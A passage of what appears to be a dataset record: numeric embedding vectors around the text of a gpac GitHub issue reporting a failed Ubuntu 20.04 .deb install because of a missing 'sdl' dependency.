-0.0019557622727006674, 0.008898180909454823, 0.01710827834904194, 0.021674655377864838, -0.019360190257430077, -0.015591365285217762, 0.008702702820301056, 0.005031616427004337, -0.004179330077022314, -0.001091747428290546, -0.011353391222655773, 0.0009925420163199306, -0.01226041093468666, 0.007314805407077074, -0.0029067653231322765, -0.006446880754083395, 0.00472667021676898, -0.002464983845129609, 0.004241883289068937, 0.0006548529490828514, 0.014989291317760944, 0.0325276218354702, -0.007858235388994217, 0.02456773817539215, -0.0002951725327875465, -0.012072752229869366, 0.006165391765534878, -0.014559238217771053, 0.01383987721055746, 0.013925888575613499, 0.008906000293791294, 0.03237123787403107, 0.01126738078892231, -0.015520992688834667, 0.01583375781774521, 0.0033153153490275145, -0.005051164422184229, -0.0030866055749356747, 0.006403875537216663, 0.024911779910326004, 0.013996260240674019, 0.03138602897524834, 0.0012256501941010356, 0.005809620954096317, 0.008147543296217918, -0.0014162417501211166, 0.009132754988968372, 0.014465408399701118, 0.0035205676686018705, -0.02026721090078354, -0.01150195486843586, 0.0013566208072006702, 0.03653101995587349, 0.00020097632659599185, -0.017733808606863022, 0.0030377358198165894, -0.027851777151226997, 0.00878871325403452, 0.04969845339655876, -0.00711932685226202, -0.013683495111763477, -0.025959543883800507, 0.0008532636566087604, -0.0024180689360946417, -0.029587624594569206, 0.03374740853905678, -0.001993880607187748, 0.01079823262989521, -0.0020955295767635107, 0.001872683991678059, 0.0036808601580560207, 0.012502804398536682, 0.0001883923978311941, 0.008092809468507767, 0.0339350663125515, 0.009828658774495125, -0.022831888869404793, 0.013300357386469841, 0.01612306572496891, -0.01197110302746296, 0.02824273332953453, 0.010446370579302311, 0.003968213684856892, -0.012283869087696075, 0.0005028684390708804, -0.022409655153751373, -0.01857827603816986, -0.010501104407012463, 0.0028148903511464596, 0.0029126296285539865, -0.021174231544137, -0.016326364129781723, 0.0006030511576682329, -0.012416793964803219, -0.007146693766117096, -0.011118817143142223, 0.003944755997508764, 0.016154343262314796, -0.007733129430562258, -0.030916878953576088, -0.005395206622779369, 0.0020486146677285433, 0.003289903048425913, -0.01631072536110878, 0.0036222166381776333, 0.00013769016368314624, -0.022284548729658127, 0.0008630375377833843, -0.0031139724887907505, 0.007428182754665613, -0.028508583083748817, 0.00455073919147253, 0.001692843739874661, 0.019594764336943626, -0.0016576576745137572, 0.01998572237789631, 0.006587625481188297, -0.020877104252576828, -0.005426483228802681, 0.0355614498257637, -0.008507223799824715, 0.020298486575484276, 0.007174060679972172, 0.0023574705701321363, -0.01242461334913969, 0.01663913019001484, 0.008890362456440926, 0.02494305558502674, -0.0018306560814380646, -0.013323814608156681, 0.005176270380616188, -0.010837327688932419, 0.013972803018987179, -0.001104453462176025, -0.0006040285807102919, -0.01380860060453415, -0.0011064083082601428, 0.0043161651119589806, 0.02871188148856163, -0.01824987307190895, -0.0009622428915463388, 0.001988016301766038, 0.02758592553436756, 0.004413904622197151, -0.01103280670940876, 0.009508074261248112, -0.01402753684669733, 0.010352540761232376, -0.007228794973343611, -0.009351691231131554, -0.037969741970300674, -0.014973652549088001, 0.01839061640202999, -0.005360020324587822, -0.012127486057579517, 0.007967703975737095, 0.01082168985158205, -0.0320584736764431, 0.0023164201993495226, 0.0038294238038361073, 0.02625667117536068, 0.01762434095144272, 0.00551640335470438, 0.019266361370682716, -0.008561958558857441, 0.016138704493641853, 0.012768655084073544, -0.02309773862361908, -0.0021326704882085323, -0.004742308519780636, -0.007916878908872604, -0.010102328844368458, 0.007639299612492323, -0.026319224387407303, 0.006603263784199953, -0.05173142999410629, -0.010712221264839172, -0.008116267621517181, 0.017999660223722458, 0.0184844471514225, 0.0022616861388087273, 0.018609553575515747, -0.0005605345941148698, -0.021471358835697174, -0.005922998301684856, 0.012502804398536682, -0.025943906977772713, -0.006548529490828514, -0.003874383866786957, -0.011634879745543003, 0.006826109252870083, -0.008921638131141663, 0.060551419854164124, 0.026428692042827606, -0.00043909356463700533, 0.007666666526347399, -0.004468638449907303, 0.003958439454436302, 0.01011014822870493, -0.015122216194868088, -0.04078463464975357, 0.021612102165818214, -0.011517592705786228, 0.019735509529709816, 0.012127486057579517, -0.02545912005007267, 0.0013605303829535842, 0.0021268059499561787, -0.0011992605868726969, -0.011017167940735817, -0.004476457368582487, -0.01909434050321579, -0.0014103773282840848, 0.005942546296864748, 0.018421893939375877, -0.015997959300875664, 0.01291721872985363, -0.00005317625982570462, 0.003919343929737806, -0.005801801569759846, 0.012479347176849842, -0.03725038096308708, 0.01226041093468666, -0.001189486705698073, -0.008022437803447247, 0.022831888869404793, 0.008225735276937485, 0.01079823262989521, -0.00040219700895249844, 0.02026721090078354, 0.006392146926373243, -0.015122216194868088, 0.005981641821563244, 0.0021561277098953724, -0.03531123697757721, -0.0026839198544621468, 0.008585415780544281, 0.0031472037080675364, -0.002189359162002802, -0.006708822213113308, 0.021721569821238518, -0.0061693014577031136, 0.006337413098663092, 0.017937107011675835, -0.014363760128617287, -0.00677528465166688, 0.0007613887428306043, -0.03187081590294838, 0.004918239079415798, -0.0035029747523367405, -0.0014015808701515198, -0.009914669208228588, -0.005356110632419586, -0.01834370195865631, -0.004722760524600744, -0.0002929733891505748, -0.02136188931763172, 0.020564338192343712, 0.010336902923882008, -0.0014377443585544825, -0.015192588791251183, 0.016623491421341896, 0.01829678751528263, -0.004734489135444164, 0.0017309620743617415, -0.016373278573155403, -0.0058721741661429405, -0.009789562784135342, 0.006548529490828514, -0.012283869087696075, -0.003436512080952525, -0.005594594404101372, -0.0036104877945035696, -0.010493285953998566, -0.021002208814024925, -0.0028637598734349012, 0.000029520308089558966, -0.00767448591068387, -0.017264660447835922, -0.012549719773232937, -0.015552269294857979, 0.002283188747242093, -0.0015472122468054295, 0.008452489972114563, -0.017327213659882545, 0.008421213366091251, 0.008749617263674736, 0.005246642976999283, -0.0009299889206886292, 0.031558047980070114, 0.005989461205899715, 0.017123917117714882, 0.005747067742049694, 0.0002651177055668086, -0.019438382238149643, -0.011634879745543003, -0.010774774476885796, -0.02272242121398449, -0.015012748539447784, -0.015716470777988434, -0.0014680435415357351, 0.008225735276937485, -0.004437361843883991, 0.01867210678756237, -0.004175420850515366, -0.011189188808202744, 0.0018130630487576127, -0.014723440632224083, 0.011705252341926098, 0.0001946232805494219, 0.007940336130559444, -0.01226041093468666, -0.0012364014983177185, -0.006153663154691458, 0.022409655153751373, 0.0040307664312422276, -0.015278599224984646, 0.006783104036003351, 0.017217746004462242, 0.021580826491117477, -0.00691993860527873, 0.01444977056235075, -0.008515043184161186, 0.004359170328825712, -0.01871902123093605, 0.01918816938996315, 0.007455549668520689, 0.024583375081419945, -0.014567057602107525, 0.0031041984912008047, 0.014551419764757156, -0.004089409951120615, -0.010938976891338825, 0.03384123742580414, 0.0073617203161120415, 0.004558558575809002, -0.008468128740787506, -0.0010145334526896477, 0.001280384138226509, -0.014574876986443996, 0.0009685959666967392, -0.016326364129781723, 0.025287099182605743, -0.009023287333548069, 0.011806901544332504, -0.011814719997346401, 0.0032859935890883207, 0.003850926412269473, -0.008475947193801403, 0.004742308519780636, -0.04535100981593132, 0.005414754152297974, 0.003938891924917698, 0.0008351818541996181, -0.02522454597055912, 0.003733639372512698, 0.0054968553595244884, -0.0034736529923975468, -0.01584157720208168, -0.0008127018227241933, -0.010813870467245579, -0.009609722532331944, -0.0005693311104550958, 0.011439401656389236, 0.0034032806288450956, -0.017686894163489342, 0.0063882372342050076, -0.008116267621517181, -0.0029048104770481586, -0.0007447730749845505, 0.012127486057579517, 0.01602923683822155, 0.005266190506517887, -0.001973355421796441, -0.016858065500855446, 0.007314805407077074, 0.002846166957169771, 0.0032253952231258154, -0.018562637269496918, -0.01240115612745285, 0.01645147055387497, 0.006830018479377031, -0.0010780638549476862, -0.011275199241936207, 0.017483597621321678, -0.013644399121403694, -0.016279449686408043, 0.026272309944033623, 0.0031198367942124605, -0.0036202617920935154, 0.021518273279070854, -0.009508074261248112, -0.010360360145568848, -0.012534081004559994, -0.03859527409076691, 0.01904742419719696 ]
1,763
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
- [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Trying to build **gpac** from source under Ubuntu 20.04 . Failed while installation: ```console (Reading database ... 584705 files and directories currently installed.) Preparing to unpack .../gpac/gpac_1.1.0-6_amd64.deb ... Unpacking gpac (1.1.0-6) over (1.1.0-6) ... dpkg: dependency problems prevent configuration of gpac: gpac depends on sdl; however: Package sdl is not installed. dpkg: error processing package gpac (--install): dependency problems - leaving unconfigured Processing triggers for man-db (2.9.1-1) ... Errors were encountered while processing: gpac ```
SDL2 support instead of SDL ...
https://api.github.com/repos/gpac/gpac/issues/1877/comments
2
2021-08-16T20:23:22
2021-09-09T16:32:36Z
https://github.com/gpac/gpac/issues/1877
972,073,630
1,877
false
This is a GitHub Issue repo:gpac owner:gpac Title : SDL2 support instead of SDL ... Issue date: --- start body --- - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Trying to build **gpac** from source under Ubuntu 20.04 . Failed while installation: ```console (Reading database ... 584705 files and directories currently installed.) Preparing to unpack .../gpac/gpac_1.1.0-6_amd64.deb ... Unpacking gpac (1.1.0-6) over (1.1.0-6) ... dpkg: dependency problems prevent configuration of gpac: gpac depends on sdl; however: Package sdl is not installed. dpkg: error processing package gpac (--install): dependency problems - leaving unconfigured Processing triggers for man-db (2.9.1-1) ... Errors were encountered while processing: gpac ``` --- end body ---
1,064
[ -0.01283266767859459, 0.04151434078812599, -0.007659912109375, -0.008407381363213062, 0.005453883670270443, 0.016219433397054672, -0.015782859176397324, 0.039847418665885925, -0.03537582978606224, -0.0024788877926766872, -0.02936961129307747, 0.001742993830703199, 0.039053644984960556, 0.0062410421669483185, -0.026154829189181328, 0.020889466628432274, -0.013355235569179058, 0.030507352203130722, -0.020638104528188705, -0.0012394438963383436, 0.010557183995842934, -0.033894117921590805, 0.013474301435053349, 0.023985182866454124, -0.010206601582467556, -0.01599453203380108, -0.0027616694569587708, -0.00023585815506521612, -0.046118225902318954, 0.0018256785115227103, -0.005450576543807983, -0.011040063574910164, -0.0004659283731598407, 0.023905804380774498, 0.04492756724357605, 0.005943377502262592, -0.0065817032009363174, 0.05641081929206848, 0.018944721668958664, 0.01853460632264614, -0.06635944545269012, -0.005348047241568565, -0.010735783725976944, -0.008255242370069027, -0.006469252053648233, 0.01349414512515068, 0.01091438252478838, 0.031459879130125046, -0.05873922258615494, -0.06376644968986511, 0.014605428092181683, -0.01471126452088356, -0.014182082377374172, -0.013666129671037197, -0.03437038138508797, -0.044398386031389236, 0.022225651890039444, -0.025202300399541855, -0.0002441266260575503, 0.030851321294903755, -0.04431900754570961, 0.03190968558192253, 0.004871783312410116, 0.03299450874328613, -0.012859126552939415, 0.019778184592723846, -0.003008069936186075, 0.03307388722896576, -0.00796419195830822, 0.0024226622190326452, -0.006750380154699087, -0.010530725121498108, -0.0020009700674563646, 0.000623029307462275, 0.02341631054878235, -0.024355608969926834, 0.034317463636398315, -0.007554075680673122, -0.03272991627454758, 0.0021861838176846504, -0.036936916410923004, -0.0034033027477562428, -0.02485833317041397, 0.023508917540311813, 0.01811126060783863, 0.008010495454072952, 0.008036954328417778, -0.05477035418152809, -0.02108790911734104, 0.010127224028110504, 0.02218596264719963, 0.0038597225211560726, 0.03971512243151665, -0.0022986349649727345, 0.01677507534623146, -0.008195708505809307, -0.04955790936946869, -0.017859898507595062, -0.022781291976571083, -0.003912640735507011, -0.021683240309357643, -0.036566488444805145, 0.008910104632377625, -0.018587524071335793, -0.012634224258363247, 0.013666129671037197, 0.02231825888156891, -0.02128635346889496, -0.009961854666471481, 0.09070182591676712, -0.0031800540164113045, -0.021630320698022842, -0.005655634682625532, 0.00930699147284031, 0.008003880269825459, 0.010861463844776154, -0.0532357282936573, -0.022582849487662315, 0.0022324873134493828, 0.007229951675981283, 0.009981698356568813, 0.010669635608792305, -0.03550812229514122, -0.0025896853767335415, -0.02923731505870819, 0.021418647840619087, 0.004570811055600643, -0.005361276678740978, -0.010484421625733376, 0.015161069110035896, -0.06440147012472153, 0.0074019357562065125, -0.010140453465282917, -0.009564967826008797, 0.03471435233950615, -0.018375851213932037, -0.0167883038520813, 0.05090732499957085, -0.028417082503437996, 0.011119440197944641, -0.02936961129307747, -0.013262628577649593, 0.013348620384931564, 0.007706215605139732, -0.017608536407351494, 0.004322757013142109, -0.025519810616970062, -0.013771966099739075, -0.0028030117973685265, -0.019063787534832954, -0.01489647850394249, -0.017357176169753075, 0.006971975322812796, -0.039318233728408813, 0.04196414723992348, 0.025241989642381668, 0.019434215500950813, 0.01975172385573387, 0.030957156792283058, 0.021431878209114075, -0.009340065531432629, 0.010510880500078201, 0.02717350423336029, -0.03799527883529663, -0.01191321387887001, -0.041487883776426315, -0.05926840379834175, 0.014909707941114902, -0.029951710253953934, 0.005662249401211739, -0.03212135657668114, 0.004593962803483009, 0.012865741737186909, 0.030242761597037315, -0.008559521287679672, -0.04103807732462883, 0.013970409519970417, 0.002588031580671668, -0.02419685572385788, -0.001962935086339712, -0.044292546808719635, -0.003886181628331542, 0.02717350423336029, 0.019063787534832954, 0.006819835398346186, -0.05789253115653992, 0.03884197026491165, -0.01817740686237812, 0.0011567592155188322, -0.010325667448341846, 0.0162988118827343, 0.009935395792126656, 0.011635392904281616, 0.005840848200023174, 0.005602716468274593, -0.005503494758158922, 0.00630718981847167, 0.021934600546956062, -0.012429166585206985, -0.017039665952324867, -0.005655634682625532, 0.00047585053835064173, 0.0027385177090764046, 0.014155623503029346, -0.03479372709989548, 0.04056181386113167, -0.028126033022999763, 0.08297576755285263, 0.03296804800629616, -0.0499812550842762, -0.000729279185179621, -0.007382091134786606, -0.007911273278295994, -0.02468634769320488, 0.010166912339627743, 0.015835776925086975, 0.035772714763879776, 0.03294159099459648, -0.002263907575979829, 0.011106210760772228, 0.022410865873098373, -0.008328004740178585, -0.0008280874462798238, -0.02358829602599144, -0.005754855927079916, 0.013031111098825932, 0.01334200520068407, 0.0037605008110404015, -0.005804467014968395, 0.054029498249292374, 0.03217427805066109, 0.012025664560496807, 0.011079751886427402, -0.01914316602051258, 0.011238506063818932, 0.030427975580096245, 0.00398209597915411, -0.011820606887340546, -0.02566533535718918, 0.020095692947506905, -0.001810795278288424, 0.005238903686404228, -0.012038894928991795, -0.019063787534832954, -0.0020869621075689793, 0.02905210107564926, 0.023998411372303963, 0.03381473943591118, 0.0044385152868926525, -0.014446672983467579, -0.026591403409838676, 0.0218949131667614, -0.016523713245987892, 0.014367296360433102, -0.010206601582467556, 0.011245121248066425, 0.02323109656572342, -0.022992964833974838, 0.006293960381299257, -0.013024495914578438, -0.010722553357481956, -0.03217427805066109, -0.0011079751420766115, 0.03016338311135769, -0.009915551170706749, -0.024289462715387344, 0.00295680551789701, 0.008830727078020573, 0.015571185387670994, -0.02517584152519703, -0.007005048915743828, -0.005801159422844648, -0.033285558223724365, 0.023786738514900208, -0.010319052264094353, -0.026353271678090096, 0.004613806959241629, -0.0007007529493421316, 0.06413687765598297, 0.019976627081632614, -0.00911516323685646, 0.009902321733534336, -0.018772738054394722, 0.0245011355727911, -0.022344717755913734, 0.0138248847797513, 0.00011524181900313124, -0.011999205686151981, -0.02565210685133934, 0.043313559144735336, 0.004031706601381302, 0.0203735139220953, -0.04318126663565636, 0.013599981553852558, 0.02692214399576187, 0.03341785445809364, -0.02029413729906082, 0.0029353073332458735, -0.01696028932929039, 0.003449606243520975, -0.005989680532366037, -0.00941944308578968, 0.004382289946079254, -0.012726831249892712, -0.013474301435053349, -0.0045046634040772915, -0.01179414801299572, 0.02979295700788498, -0.028126033022999763, 0.01310387346893549, 0.05805128440260887, -0.031115911900997162, -0.018918262794613838, 0.027887901291251183, 0.005579564720392227, 0.026975061744451523, -0.01824355497956276, -0.03302096948027611, -0.04135558754205704, 0.010709323920309544, -0.03500540181994438, -0.004911472089588642, -0.055775802582502365, -0.019592970609664917, 0.0458536371588707, -0.00617158692330122, -0.02942252904176712, -0.00838753767311573, -0.028364164754748344, 0.016312040388584137, 0.009492205455899239, 0.01902409829199314, 0.021259894594550133, -0.047573477029800415, 0.0418318510055542, -0.049161024391651154, -0.017463011667132378, 0.00954512320458889, 0.026353271678090096, -0.008976252749562263, 0.013084028847515583, 0.006555244326591492, -0.011364187113940716, -0.004944546148180962, -0.00912177748978138, -0.028708133846521378, 0.0032875442411750555, 0.024051329120993614, 0.028470000252127647, 0.0009773332858458161, 0.0007859182078391314, 0.010808546096086502, 0.04220227897167206, -0.015306594781577587, -0.005004079081118107, -0.023363392800092697, 0.025559499859809875, -0.03463497385382652, -0.025744711980223656, 0.02462020143866539, 0.01428791880607605, -0.07937732338905334, -0.013666129671037197, 0.016206204891204834, -0.011139284819364548, 0.0531298890709877, -0.032438866794109344, -0.01842876896262169, 0.006998434197157621, -0.03860383853316307, -0.013050955720245838, 0.0005717648309655488, -0.013943950645625591, 0.010517495684325695, -0.033285558223724365, 0.0276497695595026, -0.000004812508905160939, 0.019659116864204407, -0.03325910121202469, -0.0028708132449537516, -0.0317244715988636, 0.02631358429789543, -0.01823032647371292, -0.044054415076971054, 0.006945515982806683, 0.02127312310039997, 0.016457565128803253, 0.027438094839453697, -0.00006883502646815032, -0.020439662039279938, -0.026670781895518303, 0.016245892271399498, -0.0008483451674692333, -0.029951710253953934, -0.055722884833812714, -0.010113994590938091, 0.012475470080971718, -0.02899918332695961, 0.020519038662314415, -0.0013188212178647518, 0.023971952497959137, -0.040350139141082764, 0.006786761339753866, 0.00981632899492979, 0.004762639757245779, -0.002131612040102482, -0.015557955950498581, -0.03521707281470299, 0.02791436016559601, -0.02820540964603424, 0.01799219474196434, -0.015769628807902336, -0.041117455810308456, 0.010451347567141056, 0.005685401149094105, 0.008136175572872162, -0.015716711059212685, 0.020743941888213158, -0.011410490609705448, 0.03415871039032936, -0.006264193914830685, 0.01191982813179493, -0.0162988118827343, -0.015452119521796703, 0.05365907400846481, 0.0037373490631580353, -0.009551738388836384, 0.042705003172159195, 0.026789847761392593, -0.039609286934137344, 0.029951710253953934, -0.028866887092590332, 0.0008388364221900702, -0.014314377680420876, -0.007077811751514673, 0.003806804306805134, -0.045933011919260025, -0.009333450347185135, 0.009809714742004871, -0.005629175342619419, -0.033894117921590805, -0.02029413729906082, -0.016576630994677544, -0.012700372375547886, 0.03926531597971916, -0.026644323021173477, -0.0047791763208806515, 0.006287345662713051, 0.046726785600185394, 0.003922563046216965, 0.030375055968761444, 0.05156880244612694, -0.040455978363752365, -0.009452516213059425, -0.021656779572367668, -0.005682093556970358, -0.008288315497338772, 0.03272991627454758, 0.046779703348875046, -0.0006143474020063877, 0.00896302331238985, -0.022265339270234108, 0.019010869786143303, 0.009128392674028873, 0.012263797223567963, 0.04159371927380562, -0.010398429818451405, -0.03325910121202469, 0.005275284871459007, -0.009009326808154583, -0.002908848226070404, 0.015385971404612064, 0.021498026326298714, 0.0259696152061224, -0.010821775533258915, 0.033285558223724365, -0.010405044071376324, -0.014459903351962566, 0.01951359212398529, -0.032624080777168274, -0.00881088338792324, -0.03444975987076759, 0.026710471138358116, -0.0259696152061224, 0.003161863423883915, -0.011787532828748226, -0.011681696400046349, -0.005189292598515749, 0.025929925963282585, 0.00881088338792324, 0.021378960460424423, 0.04699137806892395, 0.0275968499481678, 0.005688708275556564, 0.03860383853316307, 0.020704252645373344, 0.0019414371345192194, 0.031221747398376465, 0.029263773933053017, 0.02595638483762741, -0.04201706498861313, 0.010954070836305618, 0.002640949795022607, -0.03828633204102516, 0.03598438948392868, -0.013652900233864784, -0.008341234177350998, 0.011886755004525185, -0.027252882719039917, 0.020386742427945137, 0.007898043841123581, -0.014274689368903637, -0.030666107311844826, -0.02590346708893776, -0.013368465006351471, -0.010537340305745602, 0.0019530130084604025, 0.008533062413334846, 0.01804511249065399, -0.02108790911734104, -0.02570502460002899, -0.02614159882068634, 0.00924084335565567, 0.02084977738559246, -0.02862875536084175, 0.009068859741091728, 0.0023829734418541193, -0.019725264981389046, 0.03130112588405609, 0.021193746477365494, -0.036989834159612656, -0.003866337239742279, -0.028840428218245506, 0.03373536467552185, -0.02833770588040352, 0.011284809559583664, 0.010444733314216137, -0.0179260466247797, -0.01471126452088356, -0.0027782064862549305, -0.05053689703345299, 0.021167287603020668, -0.017119042575359344, 0.007229951675981283, -0.008374308235943317, -0.0035554426722228527, -0.007679756265133619, -0.008711661212146282, -0.03355015069246292, 0.01648402400314808, 0.006657773163169622, -0.014195311814546585, -0.030004629865288734, 0.02079685963690281, -0.01834939233958721, -0.00693228654563427, 0.011284809559583664, 0.02590346708893776, 0.0137984249740839, 0.0029799570329487324, -0.008791038766503334, 0.01780698075890541, 0.004081317689269781, -0.044160254299640656, 0.010596873238682747, 0.000480811606394127, 0.02018829993903637, -0.016999976709485054, -0.0018405617447569966, -0.02382642775774002, 0.023204637691378593, 0.007884814403951168, 0.026419419795274734, -0.00545719126239419, -0.03934469446539879, 0.019804643467068672, 0.023310475051403046, -0.010193371213972569, -0.041911229491233826, -0.0029237314593046904, -0.0031585560645908117, 0.0011956209782510996, -0.028417082503437996, 0.012779749929904938, 0.00427314592525363, -0.008248627185821533, -0.016933830454945564, -0.006363415624946356, -0.004722950980067253, -0.0033189645037055016, 0.024726036936044693, 0.00693228654563427, 0.0016851144609972835, -0.03913302347064018, 0.004448437597602606, -0.005606023594737053, -0.02413070760667324, 0.044530678540468216, 0.025506580248475075, -0.0072497958317399025, -0.016880910843610764, 0.03021630272269249, 0.0008648821385577321, 0.0011493174824863672, -0.03212135657668114, 0.0013130332808941603, 0.005510109476745129, 0.010107379406690598, -0.016457565128803253, 0.005063612014055252, -0.013785195536911488, 0.03974158316850662, 0.042096443474292755, -0.02431592158973217, -0.004782483913004398, 0.007600379176437855, 0.013209709897637367, -0.007699600420892239, -0.006181509234011173, 0.03963574394583702, 0.004203690681606531, -0.002712058601900935, -0.001309725921601057, -0.03950344771146774, 0.02473926730453968, 0.05948007479310036, 0.024540822952985764, -0.021789075806736946, -0.026168057695031166, -0.032253652811050415, -0.03974158316850662, 0.016563402488827705, -0.013077414594590664, -0.020638104528188705, -0.026908913627266884, -0.0014535973314195871, 0.014129163697361946, 0.02590346708893776, -0.02456728182733059, 0.008824112825095654, 0.0046171145513653755, 0.027702687308192253, -0.026048991829156876, 0.029131479561328888, -0.01780698075890541, 0.005840848200023174, -0.014155623503029346, -0.0000432286033174023, 0.02096884325146675, 0.03582563251256943, -0.024646660313010216, -0.00576147111132741, 0.015280134975910187, 0.01222410798072815, 0.008030339144170284, 0.0024028178304433823, 0.008989482186734676, 0.01206535380333662, 0.004064780659973621, -0.016735386103391647, -0.026604633778333664, 0.012773134745657444, -0.022768063470721245, -0.028522919863462448, 0.000452698819572106, -0.01133772823959589, 0.009617885574698448, -0.026485567912459373, -0.007296099327504635, 0.013930721208453178, 0.011860295198857784, -0.0012890547513961792, 0.020889466628432274, 0.013917490839958191, 0.01559764426201582, -0.014433443546295166, 0.011496482416987419, 0.0009955239947885275, 0.00020908897568006068, -0.0004679954727180302, -0.017846668139100075, -0.022053666412830353, -0.005463805980980396, 0.009340065531432629, -0.02698829025030136, 0.009942010045051575, -0.017238108441233635, 0.007917888462543488, -0.007554075680673122, -0.02383965626358986, 0.021683240309357643, 0.005622560624033213, 0.003777037840336561, 0.06069719418883324, -0.014010097831487656, -0.0008888606680557132, 0.005969836376607418, 0.005195907317101955, -0.02505677565932274, 0.025691794231534004, -0.010431503877043724, -0.00966418907046318, -0.017555618658661842, -0.03077194280922413, 0.027385177090764046, -0.023072343319654465, -0.0041739242151379585, 0.00027802734985016286, -0.04175247251987457, 0.02839062362909317, -0.011463409289717674, -0.004802328068763018, 0.0027021365240216255, -0.017185190692543983, 0.021061450242996216, 0.015002314932644367, -0.006588317919522524, -0.0120322797447443, -0.01726456917822361, 0.026048991829156876, -0.03405287116765976, 0.000360505364369601, -0.03251824527978897, -0.009220999665558338, -0.030719025060534477, -0.014724493958055973, 0.01340815331786871, -0.005483650136739016, -0.007501157466322184, 0.005963221658021212, -0.02286067046225071, -0.029210856184363365, 0.03519061580300331, 0.015385971404612064, -0.00850660353899002, -0.03180385008454323, -0.008744735270738602, 0.013996868394315243, 0.03667232394218445, -0.014459903351962566, -0.005870614666491747, 0.003117213724181056, 0.004752717446535826, -0.0276497695595026, -0.004772561602294445, -0.03257116302847862, 0.008175864815711975, 0.016867682337760925, -0.027199963107705116, 0.0005395177868194878, 0.018071571364998817, 0.0419376865029335, 0.013031111098825932, -0.0499812550842762, 0.002199413487687707, -0.0007536711636930704, 0.019804643467068672, -0.017978964373469353, -0.004309527110308409, -0.022953277453780174, 0.010074305348098278, -0.02905210107564926, -0.0026111833285540342, 0.006585010793060064, -0.012468854896724224, -0.016087139025330544, -0.008215553127229214, -0.012812823057174683, -0.0013270896160975099, -0.004699799232184887, 0.05418825522065163, -0.02443498745560646, 0.006717306096106768, -0.007567305117845535, 0.02717350423336029, 0.002624412765726447, -0.008208938874304295, 0.00779882213100791, -0.028734592720866203, 0.020161841064691544, -0.031645093113183975, 0.012138116173446178, -0.039847418665885925, 0.020571956411004066, 0.005400965455919504, -0.03008400648832321, 0.0328092947602272, -0.004154080059379339, 0.016999976709485054, -0.02905210107564926, 0.02565210685133934, -0.008724890649318695, 0.0046931845135986805, -0.023919034749269485, 0.049584370106458664, -0.004888320341706276, -0.02395872212946415, 0.036196060478687286, 0.004448437597602606, -0.003790267277508974, -0.011020218953490257, -0.016378188505768776, -0.01914316602051258, -0.028073115274310112, 0.012568077072501183, 0.0033404624555259943, -0.021299581974744797, -0.006561859045177698, -0.036989834159612656, 0.024712808430194855, 0.006270808633416891, 0.008156020194292068, -0.006614777259528637, -0.0027137123979628086, -0.003433069447055459, -0.03193614259362221, -0.004749409854412079, -0.036513570696115494, -0.016338499262928963, 0.06799990683794022, -0.030295679345726967, 0.034873105585575104, 0.04042951762676239, -0.008367693051695824, -0.005281899590045214, -0.04310188814997673, 0.020770400762557983, -0.009908935986459255, 0.03405287116765976, 0.006697461940348148, -0.005516724195331335, 0.01225056778639555, 0.01719842106103897, -0.015915153548121452, -0.004967697896063328, 0.012720216065645218, 0.013262628577649593, 0.007679756265133619, -0.03823341056704521, 0.03169801086187363, -0.015796087682247162, -0.01543889008462429, -0.010649790987372398, -0.04783806949853897, -0.009644345380365849, -0.03026922047138214, 0.009862632490694523, -0.03341785445809364, 0.005354661960154772, 0.019725264981389046, 0.021418647840619087, 0.01559764426201582, 0.005916918162256479, -0.0035488279536366463, -0.03926531597971916, 0.027755605056881905, 0.000428720231866464, 0.012475470080971718, 0.0017264568014070392, -0.01191321387887001, 0.02639296092092991, 0.03952990844845772, 0.023059112951159477, -0.010603487491607666, -0.014248230494558811, -0.020691022276878357, -0.004640266299247742, -0.005348047241568565, -0.021670009940862656, 0.0032032057642936707, -0.0500870943069458, -0.02262253873050213, 0.013745507225394249, -0.010239674709737301, -0.019619429484009743, 0.03847154229879379, -0.029581284150481224, -0.05141004920005798, -0.02012215182185173, 0.01291865948587656, -0.02304588444530964, -0.0037638081703335047, -0.007580534555017948, -0.008023724891245365, 0.013454456813633442, -0.01428791880607605, -0.008731505833566189, -0.021127598360180855, 0.0007933598244562745, -0.0012568077072501183, 0.001150144380517304, 0.01118558831512928, -0.0183097030967474, -0.002601261017844081, 0.017965734004974365, 0.03738671913743019, 0.008043569512665272, 0.0061649722047150135, -0.038392167538404465, -0.0013328775530681014, -0.02455405332148075, 0.013170021586120129, 0.004349215887486935, -0.037545476108789444, -0.016735386103391647, 0.008605824783444405, 0.03696337342262268, 0.007448239251971245, 0.014327607117593288, -0.0019662424456328154, 0.007487927563488483, -0.0030907546170055866, -0.012964962981641293, -0.020267676562070847, -0.022940047085285187, -0.004736180417239666, -0.007593763992190361, 0.013917490839958191, 0.05090732499957085, 0.027940819039940834, 0.03143342211842537, -0.00411769887432456, -0.007898043841123581, 0.02127312310039997, -0.01398363895714283, -0.002027429174631834, -0.010471192188560963, 0.03344431519508362, -0.0015230524586513638, -0.010094149969518185, 0.008804268203675747, 0.009201155044138432, 0.02546689286828041, -0.010735783725976944, 0.022199193015694618, -0.03003108873963356, 0.0032561239786446095, -0.021921372041106224, -0.029396070167422295, -0.04042951762676239, -0.013216325081884861, 0.004825479816645384, 0.019077017903327942, -0.013586752116680145, -0.0014569046907126904, 0.0016016028821468353, -0.024646660313010216, 0.012574691325426102, -0.029290232807397842, -0.06069719418883324, -0.014790642075240612, -0.016245892271399498, -0.028364164754748344, -0.006971975322812796, -0.015888694673776627, -0.012303485535085201, -0.0164046473801136, 0.007745903916656971, 0.03635481372475624, 0.041620176285505295, 0.013692588545382023, 0.01895795203745365, -0.03418516740202904, -0.005503494758158922, 0.0031552487052977085, 0.0068727536126971245, -0.028284788131713867, 0.023747049272060394, -0.024831874296069145, -0.04217581823468208, 0.011470023542642593, 0.00750777218490839, 0.018164178356528282, 0.005791237577795982, 0.004838709719479084, 0.025083234533667564, -0.0244482159614563, -0.013838114216923714, -0.02602253295481205, -0.03190968558192253, 0.00028856965946033597, -0.020651334896683693, 0.021127598360180855, -0.017740832641720772, -0.03410579264163971, -0.015849005430936813, 0.027438094839453697, 0.01829647459089756, 0.007177033461630344, -0.015835776925086975, 0.026736930012702942, 0.015108151361346245, 0.00031750931520946324, -0.03937115520238876, 0.04754702001810074, -0.0006019447464495897, 